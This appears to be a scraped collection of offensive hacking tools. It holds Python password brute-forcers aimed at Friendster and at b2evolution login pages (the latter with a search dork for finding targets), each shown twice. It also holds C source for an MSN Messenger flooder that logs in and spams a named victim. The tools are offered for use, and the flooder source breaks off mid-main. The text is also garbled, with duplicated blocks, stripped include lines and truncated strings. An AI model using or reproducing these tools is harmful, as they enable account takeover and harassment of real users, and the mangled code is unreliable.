words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('_submitted', '1'),
('next', '/'),
('tzoffset', '240'),
('email', sys.argv[1]),
('password', word),
('remembermyemail', 'on'),
('btnLogIn', 'Log In'),
('btnSignUp','Sign Up')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("The email address you entered is not a valid Friendster login.",site):
print "\nThe email address you entered is not a valid Friendster login.\n"
sys.exit(1)
if re.search("The email address and password you entered did not match.",site) == None:
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
#Friendster.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com friendsterBF v1.1"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./friendsterbf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://www.friendster.com/login.php"
print "[+] BruteForcing:",host
print "[+] Email:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('_submitted', '1'),
('next', '/'),
('tzoffset', '240'),
('email', sys.argv[1]),
('password', word),
('remembermyemail', 'on'),
('btnLogIn', 'Log In'),
('btnSignUp','Sign Up')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("The email address you entered is not a valid Friendster login.",site):
print "\nThe email address you entered is not a valid Friendster login.\n"
sys.exit(1)
if re.search("The email address and password you entered did not match.",site) == None:
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
Python Bruteforce
#!/usr/bin/python
#b2evolution Brute Force (login.php)
#Change response on line 90 if needed. (language)
#Dork: inurl:"/htsrv/login.php" intitle:b2evo
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com b2evoBF v1.0"
print "--------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./b2evobf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('submit', 'Log in!')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
#Change this response if different. (language)
if re.search("ERROR:",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
#b2evolution Brute Force (login.php)
#Change response on line 90 if needed. (language)
#Dork: inurl:"/htsrv/login.php" intitle:b2evo
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com b2evoBF v1.0"
print "--------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./b2evobf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('submit', 'Log in!')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
#Change this response if different. (language)
if re.search("ERROR:",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
MSN Flooder
#
/***************************************************************************
#
* Copyright (C) 2007 by Dani (Rebootz, Jeet99 ecc... :-P) *
#
* cradle.dani|at|gmail.com *
#
* *
#
* This program is free software; you can redistribute it and/or modify *
#
* it under the terms of the GNU General Public License as published by *
#
* the Free Software Foundation; either version 2 of the License, or *
#
* any later version. *
#
* *
#
* This program is distributed in the hope that it will be useful, *
#
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#
* GNU General Public License for more details. *
#
* *
#
* Compiling: $ gcc -Wall msnflooder.c -o msnflooder -lssl *
#
* Usage: $ ./msnflooder -f -a victim@hotmail.com -r nickname *
#
* *
#
* [Victim must be in your contact list AND connected !] *
#
* *
#
***************************************************************************/
#
#
#include
#
#include
#
#include
#
#include
#
#define SIGINT 2
#
#
int isalnum (int c);
#
int close(int fd);
#
void _exit(int status);
#
char *getpass (const char* prompt);
#
#
int kill(pid_t pid, int sig);
#
pid_t wait (int* status);
#
#
#
BIO *bio_err = 0;
#
#
/* usage */
#
#
void usage (char* prgname)
#
{
#
fprintf (stdout, "\n"
#
"Usage: %s -a\n\n"
#
"Victim must be in your contacts list and connected !\n\n"
#
"-a option set victim\n"
#
"-f option flood forever\n"
#
"-r option restore a nick name\n\n",
#
prgname);
#
_exit (2);
#
}
#
#
/* print an error to stderr and quit */
#
#
void _error (char* msg)
#
{
#
fprintf (stderr, "%s\n", msg);
#
_exit (-1);
#
}
#
#
/* receive other data */
#
#
void clean_sock (int sd)
#
{
#
char buff[1024];
#
int rval;
#
fd_set read_set;
#
struct timeval timeout;
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd+1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, sizeof buff - 1, 0);
#
}
#
return ;
#
}
#
#
/* verify a valid email address */
#
#
int verify_mail (char* account)
#
{
#
char* ptr;
#
unsigned short int l;
#
#
l = strlen (account);
#
#
if (l > 200)
#
_error ("WHAT ?!");
#
#
if ((ptr = strchr (account, '@')) == NULL || strchr (ptr, '.') == NULL)
#
return 1;
#
#
return 0;
#
}
#
#
/* read your account and password */
#
#
int get_data (char* account, char* pass, unsigned short size)
#
{
#
int set;
#
char* tmp;
#
#
fprintf (stdout, "Your account: ");
#
fflush (stdout);
#
fgets (account, size, stdin);
#
set = strlen (account) - 1;
#
* (account + set) = 0;
#
#
if (verify_mail (account))
#
{
#
fprintf (stderr, "\"%s\" isn't a valid email address.\n", account);
#
_exit (-1);
#
}
#
#
fprintf (stdout, "Your password: ");
#
fflush (stdout);
#
tmp = getpass ("");
#
if (strlen (tmp) > size - 1)
#
_error ("Password too long !?");
#
strcpy (pass, tmp);
#
#
return 0;
#
}
#
#
/* "encode" password; change only alphanumeric char in hex :D */
#
#
char* str_encode (char* str)
#
{
#
char* ret;
#
unsigned short len = strlen (str),
#
size = (len * 2 * sizeof (char)) + 1,
#
x, y;
#
#
if ((ret = (char*) malloc (size)) == NULL)
#
_error ("Cannot allocate memory.");
#
#
memset (ret, 0, size);
#
#
for (x=0, y=0; x
if (!isalnum (str[x]))
#
{
#
sprintf(&ret[y], "%%%x", str[x]);
#
y += 2;
#
} else
#
ret[y] = str[x];
#
#
return ret;
#
}
#
#
/* resolve a hostname, save type and length of address in
#
* 'type' and 'length' and return ip */
#
#
char* resolve (int* type, int* length, char* host)
#
{
#
struct hostent* name;
#
char buffer[1024];
#
#
if ((name = gethostbyname (host)) == NULL)
#
{
#
snprintf (buffer, sizeof buffer -1, "Cannot resolve %s.", host);
#
_error (buffer);
#
}
#
#
*type = name->h_addrtype;
#
*length = name->h_length;
#
return (char*) *name->h_addr_list;
#
}
#
#
/* initialize ssl */
#
#
SSL_CTX * initialize_ctx (void)
#
{
#
SSL_METHOD* method;
#
SSL_CTX* ctx;
#
#
if (!bio_err)
#
{
#
SSL_library_init ();
#
SSL_load_error_strings ();
#
bio_err = BIO_new_fp (stderr, BIO_NOCLOSE);
#
}
#
method = TLSv1_client_method ();
#
ctx = SSL_CTX_new (method);
#
#
return ctx;
#
}
#
#
/* connect to IP, request data and save result to 'buff' */
#
#
char* _ssl_connect ( char *request, /* request page */
#
int type, /* type of address */
#
int length, /* server length */
#
char* server, /* IP server */
#
unsigned short port, /* port to connect */
#
char *buff, /* saved received data */
#
unsigned short size) /* max size received data */
#
{
#
SSL_CTX* ctx;
#
SSL* ssl;
#
BIO* sbio;
#
struct sockaddr_in server_in;
#
int sock;
#
#
ctx = initialize_ctx();
#
#
server_in.sin_family = type;
#
server_in.sin_port = htons (port);
#
memcpy ((char*) &server_in.sin_addr.s_addr, server, length);
#
#
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if ((connect (sock, (struct sockaddr*) &server_in, sizeof server_in)) < 0)
#
_error ("Cannot connect to host.");
#
#
ssl = SSL_new (ctx);
#
sbio = BIO_new_socket (sock, BIO_NOCLOSE);
#
SSL_set_bio (ssl, sbio, sbio);
#
snprintf (buff, size, request);
#
#
if (SSL_connect (ssl) <= 0)
#
_error ("Cannot connect to SSL server.");
#
if (SSL_write (ssl, buff, strlen(buff)) < 1)
#
_error ("Cannot send SSL data.");
#
memset (buff, 0, size);
#
if (SSL_read (ssl, buff, size) <= 0)
#
_error ("Cannot receive SSL data.");
#
if (SSL_shutdown (ssl) < 0)
#
_error ("Cannot shutdown SSL connection.");
#
#
SSL_free (ssl);
#
SSL_CTX_free (ctx);
#
close (sock);
#
#
return buff;
#
#
}
#
#
/* resolve a name and send ssl request to it. If received data NOT start with
#
'assertion', print error_message to stderr and quit ! */
#
#
int _ssl_request (int* type, int* length, char* host, int port, char* request, char* buff, unsigned short size,
#
char* assertion, char* error_message)
#
{
#
char* server;
#
char buffer[1024];
#
#
if ((inet_ntop (*type, host, buffer, sizeof buffer - 1)) != NULL)
#
{
#
fprintf (stdout, "Connecting to %s and send request...", buffer);
#
fflush (stdout);
#
}
#
#
#
server = resolve (type, length, host); /* type and length here will be modied */
#
_ssl_connect (request, *type, *length, server, port, buff, size);
#
#
if (assertion != (char*) NULL && strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error (error_message);
#
#
fprintf (stdout, "OK\n");
#
#
return 0;
#
}
#
#
/* connect to msn server and return a socket descriptor; socket NO close ;) */
#
#
int msn_connect (char* server, unsigned short port, int family, int length)
#
{
#
#
struct sockaddr_in sock;
#
int sd;
#
char buffer[2][1024];
#
#
if (inet_ntop (family, server, buffer[0], sizeof buffer[0] - 1) != NULL)
#
fprintf (stdout, "Connecting to %s at port %u...", buffer[0], port);
#
#
fflush (stdout);
#
#
sock.sin_family = family;
#
sock.sin_port = htons (port);
#
memcpy ((char*) &sock.sin_addr.s_addr, server, length);
#
#
if ((sd = socket (family, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if (connect (sd, (struct sockaddr*) &sock, sizeof sock) < 0)
#
{
#
if (*buffer == (char*) NULL)
#
_error ("Cannot connect to server.");
#
else
#
{
#
snprintf (buffer[1], sizeof buffer[1] - 1, "Cannot connect to %s.", buffer[0]);
#
_error (buffer[1]);
#
}
#
}
#
#
printf ("OK.\n");
#
return sd;
#
}
#
#
/* send dato to a server, save result on 'buff' without "\r\n"; socket (sd) is ALREADY connect
#
if request is null JUST receive data */
#
#
int msn_request (int sd, int family, char* server,
#
char* request, char* buff, unsigned short size)
#
{
#
char *set, buffer[2][512];
#
int read = 0;
#
#
memset (buff, 0, size);
#
#
if (request != (char*) NULL)
#
if ((send (sd, request, strlen (request), 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot send request to %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
if ((read = recv (sd, buff, size, 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot receive data from %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
buff[read] = 0;
#
if ((set = strrchr (buff, '\r')) != NULL)
#
*set = 0;
#
#
return 0;
#
}
#
#
/* call msn_request() and initialize login */
#
#
int msn_start (int sd, int type, char* server, char* account, char* buff, unsigned short buff_size)
#
{
#
#
char request[buff_size];
#
#
snprintf (request, buff_size, "VER 1 MSNP11 CVR0\r\n");
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "CVR 2 0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "USR 3 TWN I %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
#
return 0;
#
}
#
#
/* get from received data (data) new server ip end port. Save it in 'redirect' and 'port' */
#
#
int xfr_redirect (char* data, char* redirect, unsigned short size, unsigned short* port)
#
{
#
char *set, *cut;
#
#
if (strncmp (data, "XFR", 3) != 0 || (set = strstr (data, "NS ")) == NULL)
#
_error ("Cannot get server to redirect.");
#
set += 3; /* delete 'NS ' */
#
#
if ((cut = strchr (set, ' ')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* delete end of string */
#
#
if ((cut = strchr (set, ':')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* split host and port */
#
#
if (strlen (set) > size)
#
_error ("Server too big !?");
#
#
memcpy (redirect, set, size); /* copy ip of new server */
#
*port = (unsigned short) atoi (++cut); /* save new port */
#
#
fprintf (stdout, "New server received.\n Ip: %s\n Port: %u\n", redirect, *port);
#
#
return 0;
#
}
#
#
/* save id from USR message notification server...
#
MOST IMPORTANT this is required in TWINER authentication !!! */
#
#
int save_id (char* buff, char* id, unsigned short idsize)
#
{
#
char* ptr;
#
#
if ((ptr = strstr (buff, "lc=")) == NULL)
#
_error ("Cannot get id.");
#
if (strlen (ptr) > idsize)
#
_error ("ID too big !?");
#
#
strcpy (id, ptr);
#
#
return 0;
#
#
}
#
#
/* get host and page from NEXUS data in 'data'; page will save in 'page', IP server will save in host ! */
#
#
int nexus_redirect (char* buff, char* host, char* page, unsigned short sizes)
#
{
#
char *ptr, *set;
#
unsigned short size = sizes / 2;
#
#
if ((ptr = strstr (buff, "DALogin=")) == NULL || (set = strchr (ptr, '=')) == NULL)
#
_error ("Cannot get DALogin field.");
#
#
ptr = ++set ; /* delete 'DALogin=' */
#
#
if ((set = strchr (ptr, '/')) == NULL)
#
_error ("Cannot get hostname from NEXUS received data.");
#
#
*set = 0;
#
strncpy (host, ptr, size); /* save host */
#
#
set++;
#
ptr = set;
#
if ((set = strchr (ptr, ',')) == NULL)
#
_error ("Cannot get page from NEXUS received data.");
#
*set = 0;
#
#
strncpy (page, ptr, size);
#
#
fprintf (stdout, "New Host and Page obtained from NEXUS server.\n Server: %s\n Page: %s\n", host, page);
#
#
return 0;
#
}
#
#
/* get ticket from ssl server reply and save it in 'ticket' */
#
#
int save_ticket (char* reply, char* ticket, unsigned short ticket_size)
#
{
#
char* ptr, *t;
#
#
if ((ptr = strstr (reply, "Authentication-Info:")) == NULL || (t = strchr (ptr, '\'')) == NULL)
#
_error ("Cannot get passport ticket.");
#
#
ptr = ++t; /* delete ' char firts 't=' */
#
if ((t = strchr (ptr, '\'')) != NULL) /* cut ticket and replace with 0 */
#
*t = 0;
#
else
#
_error ("Unexpected error !");
#
#
if (strlen (ptr) > ticket_size)
#
_error ("Ticket too long !?");
#
#
snprintf (ticket, ticket_size, "%s\r\n", ptr);
#
#
fprintf (stdout, "OK, ticket received and saved.\n");
#
#
return 0;
#
}
#
#
/* authentication with TWINER */
#
#
int usr_receive (int sd, char* req, char* ticket, char* buff, unsigned short size, char* assertion)
#
{
#
int l, rval;
#
char *request;
#
#
memset (buff, 0, size);
#
#
l = strlen (req) + strlen (ticket) + 2;
#
if ((request = (char*) malloc (l * sizeof (char))) == NULL)
#
_error ("Cannot allocate memory for TWINER authentication send data.");
#
#
sprintf (request, "%s %s", req, ticket);
#
#
rval = send (sd, request, strlen (request), 0);
#
if (rval < 0)
#
_error ("Cannot send data !?");
#
#
if ((rval = recv (sd, buff, size - 1, 0)) < 0)
#
_error ("Cannot receive data !?");
#
#
buff[rval] = 0;
#
#
if (strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error ("Login failed.");
#
#
fprintf (stdout, "Login successfull.\n");
#
#
free (request);
#
request = NULL;
#
clean_sock (sd);
#
return 0;
#
}
#
#
/* syncronize with server and receive contacts list...We will ignore all... */
#
#
int syn_receive (int sd, char* request)
#
{
#
int rval;
#
char buff[2048];
#
fd_set read_set;
#
struct timeval timeout;
#
#
printf ("Syncronizing with server...");
#
fflush (stdout);
#
#
if (send (sd, request, strlen (request), 0) < 0)
#
{
#
printf ("Failed.\n");
#
_exit (-1);
#
}
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd + 1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select() call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, 2048, 0);
#
}
#
printf ("OK.\n");
#
return 0;
#
}
#
#
/* prepare to flood */
#
#
int init_msg (int sd, char* req, char* new_server, unsigned short server_size, unsigned short* port,
#
char* id, char* account, char* victim)
#
{
#
int sd_sb, read, type, length, size=2048;
#
char buff[size], *ptr, *set, *server, request[size];
#
#
clean_sock (sd);
#
#
if (send (sd, req, strlen (req), 0) < 0)
#
_error ("Cannot send request to start flood :-(");
#
#
fprintf (stdout, "\nInitialize flood...\n");
#
#
if ((read = recv (sd, buff, sizeof buff - 1, 0)) < 0)
#
_error ("Cannot receive data.");
#
#
buff[read] = 0;
#
#
/* read new server port and id */
#
#
if ((ptr = strstr (buff, "XFR 9 SB ")) == NULL || (set = strchr (ptr, ':')) == NULL)
#
_error ("Cannot read new server.");
#
ptr += strlen ("XFR 9 SB ");
#
*set = 0;
#
strncpy (new_server, ptr, server_size);
#
#
ptr = ++set;
#
if ((set = strchr (ptr, ' ')) == NULL)
#
_error ("Cannot read new port.");
#
*set = 0;
#
*port = atoi (ptr);
#
#
ptr = ++set;
#
if ((set = strstr (ptr, "CKI ")) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
ptr = set + strlen ("CKI ");
#
if ((set = strchr (ptr, '\n')) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
set++;
#
*set = 0; /* set NULL char after "\r\n" */
#
if (strlen (ptr) > size)
#
_error ("Data from XFR SB too long !?");
#
strcpy (id, ptr);
#
#
server = resolve (&type, &length, new_server);
#
sd_sb = msn_connect (server, *port, type, length);
#
#
snprintf (request, size, "USR 8 %s %s", account, id);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "USR 8 OK", 8) != 0)
#
_error ("Unexpected error. Try again please !");
#
#
fprintf (stdout, "Calling %s...", victim);
#
fflush (stdout);
#
#
snprintf (request, size, "CAL 10 %s\r\n", victim);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "CAL 10 RINGING", 13) != 0)
#
{
#
if (!strncmp (buff, "217", 3))
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" don't exist in your contacts list or is offline/hide.\n", victim);
#
_error (buff);
#
}
#
else
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" is invalid !?.\n", victim);
#
_error (buff);
#
}
#
}
#
#
puts ("OK.");
#
msn_request (sd_sb, type, server, NULL, buff, size); /* receive only other data... */
#
if (strncmp (buff, "JOI", 3) != 0)
#
_error ("JOI command not received !?");
#
#
return sd_sb; /* return socket descriptor */
#
}
#
#
int send_msg (int sd_sb, unsigned short force)
#
{
#
static const char header[] = "MIME-Version: 1.0\r\n"
#
"Content-Type: text/plain; charset=UTF-8\r\n"
#
"X-MMS-IM-Format: FN=Arial; EF=I; CO=0; CS=0; PF=22\r\n"
#
"\r\n";
#
#
char tmp[1003];
#
char msg[1500];
#
char *set;
#
unsigned cnt, len;
#
pid_t pid;
#
#
memset (msg, 0, sizeof msg);
#
#
fprintf (stdout, "\nFlooding%s...", (!force) ? "" : ", press Enter for stop");
#
fflush (stdout);
#
#
cnt = 0;
#
len = sizeof (tmp) - 3;
#
memset (tmp, 0, len);
#
#
while (cnt < len)
#
{
#
strcat (tmp, "\r\n");
#
cnt += 2;
#
}
#
set = strrchr (tmp, '\r');
#
if (set) *set = 0;
#
strcat (tmp, "\r\n");
#
len = strlen (header) + strlen (tmp);
#
#
sprintf (msg, "MSG 11 N %d\r\n"
#
"%s%s", len, header, tmp);
#
#
cnt = 0;
#
pid = fork();
#
#
if (pid < 0)
#
_error ("Unexpected error.");
#
else if (!pid)
#
{
#
while (cnt < 1500)
#
{
#
if (send (sd_sb, msg, strlen (msg), 0) < 0)
#
_error ("Cannot send message.");
#
if (!force) /* if 'force' parameter is true flood forever... */
#
cnt++;
#
}
#
_exit (0);
#
}
#
else
#
{
#
if (force)
#
{
#
int c;
#
while (1)
#
if ((c = getchar()) == '\n')
#
{
#
fprintf (stdout, "Stopping flood...");
#
fflush (stdout);
#
if (kill (pid, SIGINT) < 0)
#
_error ("Cannot kill child.");
#
else
#
break;
#
}
#
}
#
else
#
wait (0);
#
}
#
#
puts ("OK");
#
return 0;
#
}
#
#
int login_redirection ( char* server, char* page, char* buff, unsigned short size,
#
int* type, int* length, char* request)
#
{
#
char *set, *off;
#
#
fprintf (stdout, "Redirected to another server.\n");
#
#
if ((set = strstr (buff, "Location: ")) == NULL)
#
_error ("Cannot get new server.");
#
#
set += strlen ("Location: ");
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new server.");
#
#
while (*off == '/') off++;
#
set = off;
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new page.");
#
#
*off = 0;
#
off++;
#
#
strncpy (server, set, 512); /* 512 is size of server and page */
#
#
set = off;
#
if ((off = strchr (set, '\r')) != NULL)
#
*off = 0;
#
#
strncpy (page, set, 512); /* 512 is size of server and page */
#
#
fprintf (stdout, " Server: %s\n Page: %s\n", server, page);
#
#
_ssl_request ( type, length, server, 443, request,
#
buff, size, (char*) NULL, "Unauthorized.");
#
#
if (strncmp (buff, "HTTP/1.1 200 OK", 15))
#
{
#
puts ("\nPlease report this Error:\n");
#
_error (buff);
#
}
#
#
return 0;
#
}
#
#
int main (int argc, char** argv){
#
#
int sd, sd_sb, type, length;
#
unsigned short buff_size = 4096, port = 0, force_flood = 0;
#
char c, *server=NULL,
#
account[200], pass[200], *e_pass=NULL, *victim=NULL,
#
buff[buff_size], id[buff_size], id_sb[buff_size], nexus_redir[2][512], request[buff_size], ticket[buff_size],
#
xfr_server[50], xfr_sb_server[50], *rnick;
#
#
if (argc < 3 || argc > 6) usage (*argv);
#
#
while ((c = getopt (argc, argv, "a:r:fh")) != -1)
#
{
#
switch (c)
#
{
#
case 'a': victim = strdup (optarg);
#
if (victim == NULL) _error ("Cannot allocate memory.");
#
break;
#
case 'f': force_flood = 1;
#
break;
#
case 'h': usage (*argv);
#
break;
#
case 'r': rnick = strdup (optarg);
#
if (rnick == NULL) _error ("Cannot allocate memory.");
#
break;
#
case '?':
#
if (optopt == 'a' || optopt == 'r')
#
{
#
fprintf (stderr, "\nOption -%c requires an argument.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
else
#
{
#
fprintf (stderr, "\nUnknow -%c option.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
}
#
}
#
#
if (!victim) usage (*argv);
#
#
get_data (account, pass, 200);
#
putchar ('\n');
#
server = resolve (&type, &length, "messenger.hotmail.com");
#
sd = msn_connect (server, 1863, type, length);
#
msn_start (sd, type, server, account, buff, buff_size);
#
close (sd); /* close connection */
#
fprintf (stdout, "Connection close.\n");
#
xfr_redirect (buff, xfr_server, sizeof (xfr_server) - 1, &port); /* get new server and port */
#
server = resolve (&type, &length, xfr_server);
#
sd = msn_connect (server, 1863, type, length); /* connecting to new server */
#
msn_start (sd, type, server, account, buff, buff_size);
#
#
save_id (buff, id, buff_size); /* save id required by nexus authentication */
#
e_pass = str_encode (pass);
#
#
fprintf (stdout, "Incoming TWEENER Authentication.\n");
#
#
_ssl_request (&type, &length, "nexus.passport.com", 443,
#
"GET /rdr/pprdr.asp HTTP/1.0\r\n\r\n",
#
buff, buff_size,
#
"HTTP/1.1 200 OK", "Bad NEXUS reply.");
#
#
nexus_redirect (buff, nexus_redir[0], nexus_redir[1], sizeof (nexus_redir) - 1);
#
#
snprintf (request, buff_size,
#
"GET /%s HTTP/1.1\r\n"
#
"Authorization: Passport1.4 OrgVerb=GET,"
#
"OrgURL=http%%3A%%2F%%2Fmessenger%%2Emsn%%2Ecom,"
#
"sign-in=%s,pwd=%s,%s"
#
"User-Agent: MSMSGS\r\n"
#
"Host: %s\r\n"
#
"Connection: Keep-Alive\r\n"
#
"Cache-Control: no-cache\r\n\r\n",
#
nexus_redir[1], account, e_pass, id, nexus_redir[0]);
#
#
_ssl_request ( &type, &length, nexus_redir[0], 443, request,
#
buff, buff_size, (char*) NULL, "Unauthorized.");
#
#
if (!strncmp (buff, "HTTP/1.1 200 OK", 15))
#
;
#
else if (!strncmp (buff, "HTTP/1.1 302 Found", 18)) /* redirection... */
#
login_redirection ( nexus_redir[0], nexus_redir[1], buff, buff_size,
#
&type, &length, request);
#
else
#
_error ("\nUnauthorized.\n");
#
#
save_ticket (buff, ticket, sizeof ticket - 1);
#
usr_receive (sd, "USR 4 TWN S", ticket, buff, buff_size, "USR 4 OK");
#
syn_receive (sd, "SYN 5 0 0\r\n");
#
